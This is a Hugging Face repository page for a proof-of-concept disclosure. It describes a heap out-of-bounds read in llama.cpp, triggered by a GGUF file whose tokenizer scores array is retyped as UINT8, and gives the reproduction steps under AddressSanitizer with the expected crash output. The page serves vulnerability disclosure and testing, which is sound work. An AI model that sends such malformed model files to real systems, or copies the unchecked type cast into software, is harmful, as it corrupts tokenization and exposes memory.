Instructions to use VincHmann/gguf-security-poc with libraries, inference providers, notebooks, and local apps. Follow these links to get started.

Libraries

How to use VincHmann/gguf-security-poc with llama-cpp-python:

# !pip install llama-cpp-python

from llama_cpp import Llama

llm = Llama.from_pretrained(
	repo_id="VincHmann/gguf-security-poc",
	filename="poc_mutated_real.gguf",
)

output = llm(
	"Once upon a time,",
	max_tokens=512,
	echo=True
)
print(output)

Notebooks
Google Colab
Kaggle
Local Apps

llama.cpp

How to use VincHmann/gguf-security-poc with llama.cpp:

Install from brew

brew install llama.cpp
# Start a local OpenAI-compatible server with a web UI:
llama-server -hf VincHmann/gguf-security-poc
# Run inference directly in the terminal:
llama-cli -hf VincHmann/gguf-security-poc

Install from WinGet (Windows)

winget install llama.cpp
# Start a local OpenAI-compatible server with a web UI:
llama-server -hf VincHmann/gguf-security-poc
# Run inference directly in the terminal:
llama-cli -hf VincHmann/gguf-security-poc

Use pre-built binary

# Download pre-built binary from:
# https://github.com/ggerganov/llama.cpp/releases
# Start a local OpenAI-compatible server with a web UI:
./llama-server -hf VincHmann/gguf-security-poc
# Run inference directly in the terminal:
./llama-cli -hf VincHmann/gguf-security-poc

Build from source code

git clone https://github.com/ggerganov/llama.cpp.git
cd llama.cpp
cmake -B build
cmake --build build -j --target llama-server llama-cli
# Start a local OpenAI-compatible server with a web UI:
./build/bin/llama-server -hf VincHmann/gguf-security-poc
# Run inference directly in the terminal:
./build/bin/llama-cli -hf VincHmann/gguf-security-poc

Use Docker

docker model run hf.co/VincHmann/gguf-security-poc

LM Studio
Jan
Ollama
How to use VincHmann/gguf-security-poc with Ollama:
```
ollama run hf.co/VincHmann/gguf-security-poc
```

Unsloth Studio new

How to use VincHmann/gguf-security-poc with Unsloth Studio:

Install Unsloth Studio (macOS, Linux, WSL)

curl -fsSL https://unsloth.ai/install.sh | sh
# Run unsloth studio
unsloth studio -H 0.0.0.0 -p 8888
# Then open http://localhost:8888 in your browser
# Search for VincHmann/gguf-security-poc to start chatting

Install Unsloth Studio (Windows)

irm https://unsloth.ai/install.ps1 | iex
# Run unsloth studio
unsloth studio -H 0.0.0.0 -p 8888
# Then open http://localhost:8888 in your browser
# Search for VincHmann/gguf-security-poc to start chatting

Using HuggingFace Spaces for Unsloth

# No setup required
# Open https://huggingface.co/spaces/unsloth/studio in your browser
# Search for VincHmann/gguf-security-poc to start chatting

Docker Model Runner
How to use VincHmann/gguf-security-poc with Docker Model Runner:
```
docker model run hf.co/VincHmann/gguf-security-poc
```

Lemonade

How to use VincHmann/gguf-security-poc with Lemonade:

Pull the model

# Download Lemonade from https://lemonade-server.ai/
lemonade pull VincHmann/gguf-security-poc

Run and chat with the model

lemonade run user.gguf-security-poc-{{QUANT_TAG}}

List all available models

lemonade list

GGUF Vocabulary Loading Heap OOB Read — PoC

Vulnerability

Heap out-of-bounds read in llama.cpp vocabulary loading due to missing GGUF array element-type validation. llama-vocab.cpp casts gguf_get_arr_data() to float* without verifying the stored element type via gguf_get_arr_type(). A GGUF file declaring tokenizer.ggml.scores as GGUF_TYPE_UINT8 (1 byte per element) causes 4-byte reads from a 1-byte-per-element buffer.

The file is accepted by the GGUF parser without error; the OOB read happens later in llama_vocab::impl::load() during llama_model_load_from_file().

Repository contents

File	SHA256	Description
`poc_mutated_real.gguf`	`56addd738324fb7b2b21a8a970848d1f59115ea96882e1190b0fc98c60f04787`	Mutated from real LLaMA SPM vocab (32000 tokens). Scores array element type changed from FLOAT32 to UINT8, payload truncated to match. All other metadata unchanged.
`mutate_real_gguf.py`	—	Script used to create the PoC from the original vocab file.

How to reproduce

1. Clone and build llama.cpp with AddressSanitizer

git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
mkdir build-asan && cd build-asan
cmake .. \
  -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer" \
  -DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer" \
  -DCMAKE_BUILD_TYPE=Debug
cmake --build . -j$(nproc)
cd ..

2. Download PoC and run

huggingface-cli download VincHmann/gguf-security-poc poc_mutated_real.gguf --local-dir .

ASAN_OPTIONS='detect_leaks=0' ./build-asan/bin/llama-tokenize -m poc_mutated_real.gguf --prompt 'test'

Note: --prompt is required by the tool's CLI, but the crash occurs during llama_model_load_from_file() before the prompt is processed.

3. Expected output

==PID==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x...
READ of size 4 at 0x... thread T0
    #0 in llama_vocab::impl::load(...) src/llama-vocab.cpp:2229

0x... is located 0 bytes after 32000-byte region

Tested on

llama.cpp commit d0a6dfeb2 (HEAD, 2026-04-06)
Ubuntu (WSL2), g++ 13, cmake 3.28
AddressSanitizer + UndefinedBehaviorSanitizer

Impact

The heap OOB read (up to 96KB for a 32000-token vocabulary) occurs during the standard llama_model_load_from_file() call. Without ASAN, the corrupted scores silently alter tokenization output.

Downloads last month: 11

GGUF

Model size

0 params

Architecture

llama

Hardware compatibility

We're not able to determine the quantization variants.

View all variants

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support